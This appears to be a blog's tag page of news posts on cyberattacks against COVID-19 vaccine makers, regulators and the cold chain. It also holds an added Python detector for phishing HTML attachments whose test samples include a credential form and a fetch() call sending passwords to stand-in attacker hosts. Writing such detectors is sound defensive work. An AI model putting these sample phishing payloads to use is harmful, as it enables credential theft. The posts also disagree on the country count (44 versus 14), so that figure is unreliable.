Posts with label COVID-19 Vaccine

Threat Actors Target Covid-19 Vaccine Cold Chain Via Spear-Phishing Campaign


Cybercriminals are continuing to target the COVID-19 vaccine cold chain, the means of delivering and storing vaccines at safe temperatures, with spear-phishing campaigns that leverage pharma and biomedical lures, according to an updated IBM X-Force report. 

Threat actors are specifically targeting transportation, healthcare, IT, and electronics sectors. Researchers also discovered the attackers targeting government agencies and vendors that support public health entities, among other targets.

The latest research is an update of a December IBM X-Force report that shed light on widespread phishing tactics leveraged by cybercriminals against vaccine supply chain organizations and other healthcare sectors. IBM X-Force established a cyber task force at the beginning of the pandemic to track cyber threats targeting critical infrastructure organizations.

The global phishing campaign against cold storage supply chain members was first discovered in September, initially tied to Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program. The threat actors masqueraded as biomedical executives and targeted enterprise leadership members in the IT, finance, sales, and procurement departments, who would likely be involved with vaccine cold chain efforts.

The attackers sent the messages to multiple employees across the enterprise, with some messages purporting to be help or support pages of the targeted enterprise. Instead, the messages contained malicious HTML attachments that opened locally on the devices and prompted victims to enter user credentials for access. This week’s update revealed that the researchers have detected an additional 50 files tied to spear-phishing emails targeting at least 44 entities in 44 different countries, including the US and Canada.
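The attachment technique described above (a locally opened HTML file that prompts for credentials and sends them elsewhere) leaves recognisable traces that mail-gateway or triage tooling can check for. The following script is an added example, not code from the IBM X-Force report or from this blog; it parses an HTML attachment, flags password fields (inside a form or orphaned for a script to read) and flags inline scripts that reference hosts outside the organisation's trusted domains. The three sample attachments and every domain name in them (`corp.example`, `collector.example-bad.invalid`, `drop.example-bad.invalid`) are constructed for illustration.

```python
"""Triage HTML email attachments for credential-harvesting prompts.

Added example; not code from the IBM X-Force report or from this blog.
The attachments and domain names below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample 1: a fake "support portal" page that asks for credentials
# and posts them to a host outside the organisation.
SUSPICIOUS_ATTACHMENT = """<html><body>
<h2>Support Portal - your session has expired</h2>
<form method="post" action="https://collector.example-bad.invalid/submit.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <button type="submit">Sign in</button>
</form>
</body></html>"""

# Constructed sample 2: no <form> at all; the password field is read by an
# inline script that sends it away with fetch().
JS_EXFIL_ATTACHMENT = """<html><body>
<p>Enter your details to view the document</p>
<input type="email" id="u"><input type="password" id="p">
<button onclick="go()">Open</button>
<script>
function go() {
  fetch("https://drop.example-bad.invalid/c", {method: "POST",
        body: JSON.stringify({u: u.value, p: p.value})});
}
</script>
</body></html>"""

# Constructed sample 3: an ordinary attachment with no credential prompt.
BENIGN_ATTACHMENT = """<html><body><h1>Shipping schedule</h1>
<table><tr><td>Lot 1</td><td>Week 3</td></tr></table></body></html>"""

URL_RE = re.compile(r"""https?://[^\s'"()]+""")


class _Collector(HTMLParser):
    """Collects forms, orphan password fields and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.forms = []        # {"action": str, "has_password": bool, "orphan": bool}
        self.scripts = []      # bodies of inline <script> elements
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False, "orphan": False}
        elif tag == "input" and (a.get("type") or "text").lower() == "password":
            if self._form is not None:
                self._form["has_password"] = True
            else:
                # A password field outside any <form> is only useful to a script.
                self.forms.append({"action": "", "has_password": True, "orphan": True})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _is_external(url, trusted_domains):
    """True when the URL's host is not one of the organisation's trusted domains."""
    host = urlparse(url).hostname or ""
    return bool(host) and not any(host == d or host.endswith("." + d) for d in trusted_domains)


def triage_html_attachment(html, trusted_domains):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        if form["orphan"]:
            findings.append("password field outside any <form> (script-driven submission)")
        elif _is_external(form["action"], trusted_domains):
            findings.append(f"credential form posts to external host {urlparse(form['action']).hostname}")
        else:
            # A locally opened attachment has no legitimate reason to ask for a password.
            findings.append("credential form in a local HTML file (attachments cannot authenticate you)")
    for script in parser.scripts:
        for url in URL_RE.findall(script):
            if _is_external(url, trusted_domains):
                findings.append(f"inline script references external host {urlparse(url).hostname}")
    return findings


if __name__ == "__main__":
    samples = [("suspicious", SUSPICIOUS_ATTACHMENT), ("js-exfil", JS_EXFIL_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)]
    for name, doc in samples:
        print(name, triage_html_attachment(doc, ["corp.example"]) or "clean")
```

The heuristics are deliberately conservative: any password prompt in a file that arrived as an attachment is treated as a finding, because a static HTML file opened from disk cannot legitimately authenticate a user, and external hosts in inline script are reported regardless of whether a form is present. A gateway rule built on this would quarantine rather than block outright, since the trusted-domain list is the only thing separating a phishing kit from an internally produced HTML report.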

“The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage, and ultimate distribution of vaccines. Spear-phishing attempts were associated with multiple executive activities and other roles,” researchers explained.

In particular, the cybercriminals are targeting CEOs, purchasing managers, system administrators, presidents, heads of supply and logistics, finance directors, HR officers, and a host of other leaders within the enterprise. IBM researchers first noticed the latest phishing campaign directly following the publication of the previous report. The malicious email was addressed to a German pharmaceutical and bioscience solutions company working on vaccine production and associated activities. The target also appeared to be a client of one of the original targets detected in the initial campaign.

“While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat,” wrote the researchers.

IBM Flags More Cyber Attacks on COVID-19 Vaccine Infrastructure


On Wednesday, IBM reported that its cyber-security unit has discovered more digital attacks targeting the global COVID-19 vaccine supply chain since the problem was first reported late last year. 

IBM Security X-Force has now revealed that the number of organizations affected has increased since the previous evaluation. A total of 44 organizations from 14 countries were singled out for attack. The targeted companies are key organizations involved in transportation, warehousing, storage, and distribution in Europe, North America, South America, Africa, and Asia. 

The threat actor began sending spear-phishing emails in early September 2020, before any COVID-19 vaccine variant was approved, in order to pre-position themselves in the evolving infrastructure. The emails requested quotes for the Cold Chain Equipment Optimization Platform (CCEOP) program and mentioned Haier Biomedical products used for storage and transportation of vaccines. 

IBM, which has identified 50 files associated with the attacks, states that the threat actor has excellent knowledge of the cold chain. Spear-phishing emails impersonating an executive from the Chinese biomedical firm Haier Biomedical were extensively used in the attacks.

IBM stated that “While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat.” 

The attacks used HTML files that included references to solar panel manufacturers and petrochemical companies. Around eight distinct organizations in the aviation, aerospace, shipping, and transportation services industries, as well as biomedical research, medical manufacturing, pharmaceuticals, and hygiene services, were hit by the attackers. Six companies in web-hosting, software creation, IT operations and outsourcing, and online platform provisioning were also affected. 

Government agencies (involved in the import/export of special products, transportation, and public health), as well as establishments in the refrigeration and metal manufacturing industries, were targeted, according to IBM. 

According to IBM security analysts, the attackers were attempting to gain access to the COVID-19 vaccine cold chain for espionage purposes, including information on national Advance Market Commitment (AMC) agreements, distribution timetables, collection or duplication of the electronic documents, and warehousing technical requirements. 

“While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation,” IBM added.

Hacker Hacks Underground Covid Vaccine Market On Dark Web


In a recent cybersecurity incident, an attacker took down a vaccine marketplace that was running on the dark web. The attacker placed fake orders and then cancelled them, collecting refunds in Bitcoin worth $752,000, according to a report released on Thursday. According to a post on the market's forum, the attacker found a way to place fake orders, cancelled them immediately using the trader's seller account, and issued refunds to himself that were withdrawn at once.

Check Point Research says the method allowed the hacker to make 13 Bitcoins (BTC), an amount equal to $752,000. The vaccine marketplace on the dark web that was selling these products is currently down because of the hack. But the attack hasn't put a stop to the sale of Covid-19 relief products on the dark web. Following the marketplace shutdown, another forum was set up at the same address, offering various ads including Covid-19 vaccines (documents included), at heavy discounts for promotional purposes.

Cybersecurity experts recently found that fake Covid-19 vaccine certificates and forged Covid-19 test results were being sold on dark web and hacking platforms for amounts as low as Rs 1800 ($25) and up to Rs 18,000 ($250), aimed at people looking to book flights, travel across borders, find a new job, or attend a function. An interested buyer obtains these 'fake certificates' by sending their details and money to the seller on the dark web; the seller then e-mails back the forged documents for $250.

Research from Check Point revealed that fake negative Covid-19 test results are available on the dark web for as little as $25. Covid-19 vaccine ads on the darknet have tripled over the last three months. The selling forums on the dark web are based in European countries such as Spain, Russia, France, and Germany. According to the experts, "The vaccines advertised include Oxford-AstraZeneca (at $500), Johnson & Johnson ($600), the Russian Sputnik vaccine ($600) and the Chinese SINOPHARM vaccine." Check Point Research says, "as a result, the marketplace is down completely since, and at this point of time is yet to be restored online."

Hackers Altered the Covid-19 Vaccine Records


The European Union's drug regulator has said that COVID-19 vaccine documents that were purloined from its servers in a cyberattack have been not only leaked on the web but "manipulated" by hackers.

A cyber-attack hit the European Medicines Agency (EMA). At the time the hack was disclosed, the EMA did not give technical details about the attack, nor any information on whether the attack would affect its operations while it was evaluating and approving COVID-19 vaccines.

The European agency plays a vital role in the evaluation of COVID-19 vaccines across the EU, and it has access to sensitive and confidential data, including trial results on quality, safety, and effectiveness. The European Medicines Agency said on Friday that its ongoing investigation into the cyberattack showed that hackers obtained emails and documents from November related to the evaluation of experimental Covid vaccines.

The agency, which regulates medications and drugs across the 27-member EU, held troves of confidential COVID-19 information as part of its vaccine approval process.

"A portion of the correspondence has been manipulated by the culprits before distribution in a manner which could sabotage trust in vaccines," the agency said. It didn't clarify what data was altered, but cybersecurity experts say such practices are typical of disinformation campaigns launched by governments.

Italian cybersecurity firm Yarix said, "the intention behind the leak by cybercriminals is sure: to cause critical harm to the reputation and credibility of EMA and Pfizer." The agency said that given the overwhelming toll of the pandemic, there was an "urgent public health need to make vaccines accessible to EU residents as quickly as time permits." The EMA demanded that despite that urgency, its decisions to recommend the green-lighting of vaccines were based "on the strength of the scientific proof on a vaccine's safety, quality and efficacy, and nothing else.” 

The agency, which is based in Amsterdam, came under heavy criticism from Germany and other EU member states in December for not approving vaccines against the virus more rapidly. The EMA gave its first recommendation for the Pfizer and BioNTech vaccine weeks after the shot received approval in Britain, the United States, Canada, and elsewhere.

The EMA said law enforcement authorities are taking necessary action in response to the cyberattack.

Russia’s ‘InfoWarrior’ Hackers a New Game Changer for the Geopolitical Agenda?

The worst cyber attack of 2020, on SolarWinds, allegedly carried out by Russian state-backed threat actors, is a sign of advancement in several ways: Moscow appears to be improving its technical abilities, which may pose a bigger cyber espionage threat globally.

The attack compromised many important departments of the U.S. government, big tech companies, hospitals, and universities, revealing a wide web of online intrusion and illustrating how cyber espionage operations have become routine work for Russia’s ‘infowarriors’. Should it make the West more concerned about the security of its governments, or should the whole world consider these attacks the new normal?

Russia’s diplomatic relations with the West have been bitter since the World Wars, and even today the situation continues to border on bitterness. Moscow sees cyber attacks as a cheap and effective way to advance its geopolitical aspirations, and therefore Russia is unlikely to step back from such tactics even while facing U.S. sanctions or countermeasures.

Bilyana Lilly, a researcher at the think tank Rand Corp, said, “Such operations are a relatively inexpensive and effective way to conduct geopolitics that is crucial for Russia, which is facing considerable economic and demographic challenges and whose economy is smaller than Italy’s.”

Referencing an article in a Russian military journal, she noted that “the complete destruction of the information infrastructures” of the U.S. or Russia could be carried out by just one battalion of 600 “info warriors” at a price tag of $100 million.

It has been an arduous task for the West to respond forcefully to Moscow’s growing cyber abilities. Washington’s retaliatory measures, including sanctions, diplomatic expulsions, property seizures, and even major threats such as expulsion from the world’s leading economic organizations, appear to have little to no impact on its operations.

Pavel Sharikov, a senior fellow at the Russian Academy of Science’s Institute for U.S. and Canadian Studies, said, “Russia doesn’t see sanctions as an instrument of pressure but as an instrument of punishment. The Russian government says, ‘Yes we understand that you don’t like what we are doing, but we don’t really care.’”

Notably, US officials and tech companies have accused the Russian regime of cyber espionage attacks on multiple occasions, including attempts to interfere ahead of the 2020 election. The WSJ found that Moscow’s cyber spies and trolls have expanded their 2016 toolbox with new stratagems.

According to a paper co-written by Rand’s Ms. Lilly, “in recent years, so-called information confrontation has become an established part of Russia’s military doctrine”. In 2019, Gen. Valery Gerasimov, Russia’s General Staff chief, said that in modern warfare, cyberspace “provides opportunities for remote, covert influence not only on critical information infrastructures but also on the population of the country, directly influencing national security.”

According to the authorities, Moscow is trying to advance its geopolitical agenda through its cyberattack tactics; its initial targets were ex-Soviet countries. In 2007, Russia-backed hackers attacked Estonia, compromising government websites, bank credentials, and newspapers.

Ukraine and Georgia were attacked next; in most cases, state media firms and election infrastructure were targeted. Russian state-backed hackers then set their sights on the West. “In 2014, they penetrated the State Department’s unclassified email system and a White House computer server and stole President Barack Obama’s unclassified schedule, U.S. officials said.

According to the German authorities, in 2015, they got into the German parliament, in what experts described as the most significant hack in the country’s history.”

That is not all: Russia has also been accused of interference in the French elections and the Pyeongchang Winter Olympics, and of the NotPetya malware attacks on corporate networks. Now, Western governments are accusing Russia of cyber espionage attacks against the COVID-19 vaccine supply chain. Russia has denied any involvement.

Important Documents Related to the Covid-19 Vaccine Leaked on the Darkweb


As the pandemic continues to spread globally via a new Covid-19 variant, attacks on medical agencies are surging likewise. Pharmaceutical companies and government organizations continue to bear the brunt. According to sources, the European Medicines Agency (EMA) became the victim of the latest attack, in which “several documents related to the Covid-19 vaccine were allegedly stolen and released on a Darkweb market, security experts said”.

Security experts from the threat intelligence firm Cyble also said, “during the evaluation of data, the experts have found that various confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked”. The illegal market for Covid-19 vaccines is exerting its malicious influence ever more widely as it continues to expand in scope.

In this regard, the European Medicines Agency said, “EMA has been the subject of a cyber attack. The Agency has swiftly launched a full investigation, in close cooperation with law enforcement and other relevant entities”.

“EMA cannot provide additional details whilst the investigation is ongoing. Further information will be made available in due course”, the agency further added.

The agency is investigating the security incident; however, there is no clarification regarding the source of the attack. Whether the hackers succeeded in their attempt also remains unclear as of now.

The European Medicines Agency has been the victim of cyber attacks twice in recent months. It has become a target because it holds all the necessary and confidential information related to the Covid-19 vaccines, and it should also be noted that it played a massive role in the assessment of those vaccines.

The leaked documents were also being shared on Russian-speaking forums when the threat intelligence firm Cyble started tracking them. During the investigation, the experts also found that the attackers held the internal email in which the portal link was shared, as well as the login page of the portal used to access the reports, all of which were shared as screenshots. Furthermore, the documents included the supposed evaluation reports of the Covid-19 vaccine, which also comprised the summary report of drug release

Espionage Attacks Increasingly Concentrated on the Covid-19 Vaccine Supply Network


Now more than ever, malicious actors are targeting the healthcare space as important research on COVID-19 therapeutics is developed and companies around the world such as Pfizer, Moderna, and other biotech firms prepare a vaccine against the deadly virus. While several pieces of research are underway, it is becoming clear that nation-states are now targeting these companies with a vengeance as the quest to beat the pandemic continues.

According to intelligence reports, cyber espionage actors have a keen eye on the COVID-19 vaccine supply network; malware named ‘Zebrocy’ is being used by threat actors in vaccine-related cyberattacks. Earlier this month, reports showed that Pfizer and BioNTech vaccine documentation submitted to EU regulators was accessed by threat actors.

Cyber-attacks on firms are not new, but threat actors have recently zeroed in on the Covid-19 vaccine chain, capitalizing on the fear of contagion among the public.

COVID-19 vaccine manufacturer Dr. Reddy’s Laboratories was attacked in October, forcing plants to shut down across India, the U.K., Brazil, and the USA. According to official reports, the India-based firm has contracted to manufacture the Russian “Sputnik V” vaccine.

In July 2020, the U.S. Department of Homeland Security (DHS) warned governments and firms about the Russia-linked group APT29, which was targeting U.S., Canadian, and British Covid-19 vaccine research companies.

Notably, when the pandemic began, the World Health Organization (WHO) was also targeted by the DarkHotel APT group, which looked for sensitive information. 

Likewise, the U.S. Justice Department has also accused Chinese-sponsored threat actors of targeting COVID-19 researcher Moderna. 

“Even if you are good at science, this is a cheap insurance policy to maintain a seat at the table for the game of nations,” said Sam Curry, Cybereason CSO. “The headlines around stealing vaccine research, data, and information used to create vaccines for the world’s pandemic should be a wakeup call to research firms and both the private and public sector. It is not a question of if hacking will be done, but rather how much has already taken place.”

“Some groups have likely infiltrated these companies and have not been caught, and are pilfering through specific vaccine information, patents and other valuable content,” he further added. “A vaccine for COVID is a strategically valuable (maybe crucial) asset. Whoever gets a vaccine first has an economic advantage and it is worth billions of dollars to a country and its economy. It is the ultimate IP with immediate value.” 

Rob Bathurst, CTO of cybersecurity firm Digitalware, said, “The rule of thumb for an attacker is to use just enough to get the job done, and that is usually commercial malware first and custom packages only if needed for a specific target.”

Warning users, Curry said, “To combat this type of attack, organizations need to continue to improve their security hygiene, implement around-the-clock threat hunting and increase their ability to detect malicious activity early. Security-awareness training is also needed and employees should not open attachments from unknown sources and never download content from dubious sources.”